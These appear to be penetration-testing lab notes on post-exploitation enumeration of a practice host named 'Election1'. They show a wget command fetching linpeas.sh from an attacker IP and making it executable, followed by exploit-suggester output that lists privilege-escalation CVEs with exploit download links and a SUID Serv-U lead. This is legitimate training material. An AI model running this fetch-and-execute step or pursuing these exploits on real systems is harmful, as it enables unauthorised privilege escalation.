PEAS
Conducting an automated enumeration after performing a manual enumeration on the election host.
www-data@election:/dev/shm$ wget -q http://192.168.45.247/linpeas.sh ; chmod 755 ./linpeas.shDelivery complete
/Play/Election1/4-Post_Enumeration/attachments/{030E5955-1B3A-4997-AEBA-D6A9451D27AD}.png)
Executing PEAS
CVEs
╔══════════╣ Searching Signature verification failed in dmesg
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#dmesg-signature-verification-failed
dmesg Not Found
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2021-4034] PwnKit
Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
Exposure: probable
Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: probable
Tags: mint=19,[ ubuntu=18|20 ], debian=10
Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: probable
Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2020-9470] Wing FTP Server <= 6.2.5 LPE
Details: https://www.hooperlabs.xyz/disclosures/cve-2020-9470.php
Exposure: probable
Tags: [ ubuntu=18 ]
Download URL: https://www.hooperlabs.xyz/disclosures/cve-2020-9470.sh
Comments: Requires an administrator to login via the web interface.
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
Exposure: less probable
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2022-2586] nft_object UAF
Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
Exposure: less probable
Tags: ubuntu=(20.04){kernel:5.12.13}
Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
[+] [CVE-2019-18634] sudo pwfeedback
Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
Exposure: less probable
Tags: mint=19
Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
Comments: sudo configuration requires pwfeedback to be enabled.
[+] [CVE-2019-12181] Serv-U FTP Server
Details: https://blog.vastart.dev/2019/06/cve-2019-12181-serv-u-exploit-writeup.html
Exposure: less probable
Tags: debian=9
Download URL: https://raw.githubusercontent.com/guywhataguy/CVE-2019-12181/master/servu-pe-cve-2019-12181.c
ext-url: https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-12181/SUroot
Comments: Modified version at 'ext-url' uses bash exec technique, rather than compiling with gcc.
[+] [CVE-2017-0358] ntfs-3g-modprobe
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1072
Exposure: less probable
Tags: ubuntu=16.04{ntfs-3g:2015.3.14AR.1-1build1},debian=7.0{ntfs-3g:2012.1.15AR.5-2.1+deb7u2},debian=8.0{ntfs-3g:2014.2.15AR.2-1+deb8u2}
Download URL: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41356.zip
Comments: Distros use own versioning scheme. Manual verification needed. Linux headers must be installed. System must have at least two CPU cores.Network
/Play/Election1/4-Post_Enumeration/attachments/{06EE4AD6-7C98-4E72-8398-E001BB1BA0D6}-1.png)
Polkit
/Play/Election1/4-Post_Enumeration/attachments/{E112A014-A38C-400A-9100-6513FDDC841D}.png)
Installed Programs
/Play/Election1/4-Post_Enumeration/attachments/{C92DC3DA-FFF9-4FE1-A403-66B469D5E730}.png)
Compilers
/Play/Election1/4-Post_Enumeration/attachments/{B149BE58-06C7-4AE0-971B-9B808A871A42}.png)
Apache
/Play/Election1/4-Post_Enumeration/attachments/{EC338EE8-7E0C-42C5-84B4-0E0F752DD409}.png)
SSH
/Play/Election1/4-Post_Enumeration/attachments/{C3575861-8C6C-459F-B744-BD5BFD91B4E1}.png)
/Play/Election1/4-Post_Enumeration/attachments/{21FB5C24-3D82-4DD3-9446-3EB9C6E6E736}.png)
/Play/Election1/4-Post_Enumeration/attachments/{00573E7E-AC12-4251-9C84-CE1404C5DD57}.png)
SUID
/Play/Election1/4-Post_Enumeration/attachments/{8ADB221F-CA43-4C6A-AC59-F8CED30BFBFC}.png)
/usr/local/Serv-U
Interesting Files / Directories
/Play/Election1/4-Post_Enumeration/attachments/{993121C9-29B9-404E-8CCD-39794BF7BF06}.png)
/home/love/.mozilla